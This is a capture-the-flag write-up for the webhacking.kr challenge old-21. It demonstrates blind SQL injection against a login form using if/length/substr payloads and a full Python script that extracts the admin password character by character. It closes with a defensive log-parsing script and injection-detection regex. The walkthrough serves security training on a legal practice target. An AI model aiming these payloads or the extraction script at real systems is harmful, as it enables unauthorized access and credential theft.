
[Webhacking.kr] old-21

old-21

This problem is in webhacking.kr.
URL: https://webhacking.kr/challenge/bonus-1/index.php/

Opening the URL shows the login page below (screenshot).

First, Admin Login

Submitting "id: admin, pw: admin" returns "login fail".

Second, SQL Injection

I tried SQL injection with the payload admin' or '1'='1
Result: Wrong password

Then I tried admin' or '1'='0
Result: Wrong password

The input this time is different from before, but the response is the same.
Through this, I knew that the ID is 'admin'.

Third, Blind SQL Injection (ID Length)

admin' and if(length(id)like(5),1,0) or '1'='0 (Result: Wrong Password)
admin' and if(length(id)like(6),1,0) or '1'='0 (Result: login fail)

This test confirms that the length of the ID is 5.
The same difference in responses also gives us a way to read the password:

True: (Result: Wrong Password)

False: (Result: login fail)

Fourth, Blind SQL Injection (PW Length, PW)

Password Length Payload

for i in range(50):
    url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin' and if(length(pw)like({}),1,0) or '1'='0&pw=1".format(i)
    res = requests.get(url, headers=headers, cookies=cookies)

    # True branch (length matches) returns "wrong password"; false branch returns "login fail".
    if 'wrong password' in res.text:
        str_len = i
        break

Password Payload

for i in range(1, str_len + 1):
    for j in range(48, 128):  # printable ASCII codes
        url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin' and if(ord(substr(pw,{},1))like({}),1,0) or '1'='0&pw=1".format(i, j)
        res = requests.get(url, headers=headers, cookies=cookies)
        if 'wrong password' in res.text:
            password += chr(j)
            break

Result

import requests

# The session cookie ties the requests to the logged-in challenge session; the User-Agent is cosmetic.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117'}
cookies = {'PHPSESSID': 'YOUR SESSION ID VALUE'}

def HttpRequest():
    str_len = 0
    password = ""

    # Password length: the true branch returns "wrong password", the false branch "login fail".
    for i in range(50):
        url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin' and if(length(pw)like({}),1,0) or '1'='0&pw=1".format(i)
        res = requests.get(url, headers=headers, cookies=cookies)

        if 'wrong password' in res.text:
            str_len = i
            break

    # Password characters: test each position against the printable ASCII codes 48..127.
    for i in range(1, str_len + 1):
        for j in range(48, 128):
            url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin' and if(ord(substr(pw,{},1))like({}),1,0) or '1'='0&pw=1".format(i, j)
            res = requests.get(url, headers=headers, cookies=cookies)
            if 'wrong password' in res.text:
                password += chr(j)
                break

    print("Password Length: {}".format(str_len))
    print("Password: {}".format(password))

if __name__ == '__main__':
    HttpRequest()

Password Length: 36
Password: there_is_no_rest_for_the_white_angel
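From the defending side, the probing above is easy to spot in a web server's access log: the same URL is requested over and over with only a numeric literal changing inside an if()/length()/substr() expression in the id parameter. The following is an added example, not part of the original post; the Common Log Format lines are constructed, and the signature regex and burst threshold are my own assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not real server logs). They mirror the probes
# above: one URL, only the numeric literal changing, plus ordinary logins.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2021:10:00:01 +0900] "GET /challenge/bonus-1/index.php?id=admin&pw=admin HTTP/1.1" 200 512
10.0.0.5 - - [01/Aug/2021:10:00:02 +0900] "GET /challenge/bonus-1/index.php?id=admin%27+and+if%28length%28pw%29like%285%29%2C1%2C0%29+or+%271%27%3D%270&pw=1 HTTP/1.1" 200 498
10.0.0.5 - - [01/Aug/2021:10:00:02 +0900] "GET /challenge/bonus-1/index.php?id=admin%27+and+if%28length%28pw%29like%286%29%2C1%2C0%29+or+%271%27%3D%270&pw=1 HTTP/1.1" 200 503
10.0.0.5 - - [01/Aug/2021:10:00:03 +0900] "GET /challenge/bonus-1/index.php?id=admin%27+and+if%28ord%28substr%28pw%2C1%2C1%29%29like%28116%29%2C1%2C0%29+or+%271%27%3D%270&pw=1 HTTP/1.1" 200 498
10.0.0.9 - - [01/Aug/2021:10:00:04 +0900] "GET /challenge/bonus-1/index.php?id=guest&pw=guest HTTP/1.1" 200 512
"""

# Common Log Format: client IP, request line and status are all we need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Boolean-blind probing leaves conditional/string-inspection functions or a
# quote-terminated OR/AND in a parameter that should hold only a username.
SQLI_RE = re.compile(r"(?i)\b(if|length|substr|substring|ord|ascii)\s*\(|'\s*(or|and)\s+'")

def flag_sqli_params(target):
    """Return {param: decoded value} for every query value matching SQLI_RE."""
    hits = {}
    # parse_qs percent-decodes and turns '+' into spaces for us.
    for name, values in parse_qs(urlsplit(target).query).items():
        for value in values:
            if SQLI_RE.search(value):
                hits[name] = value
    return hits

def analyse_log(text, burst_threshold=3):
    """Return (flagged requests, per-client counts, clients at/above threshold)."""
    flagged, per_ip = [], Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        hits = flag_sqli_params(m['target'])
        if hits:
            flagged.append((m['ip'], hits))
            per_ip[m['ip']] += 1
    bursts = {ip for ip, n in per_ip.items() if n >= burst_threshold}
    return flagged, dict(per_ip), bursts

if __name__ == '__main__':
    flagged, per_ip, bursts = analyse_log(SAMPLE_LOG)
    print(per_ip, 'bursting:', bursts)
```

The per-client burst count matters more than any single signature hit: a character-by-character extraction like the one above needs hundreds of near-identical requests, which is the behaviour a rate limit or alert should key on.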

 
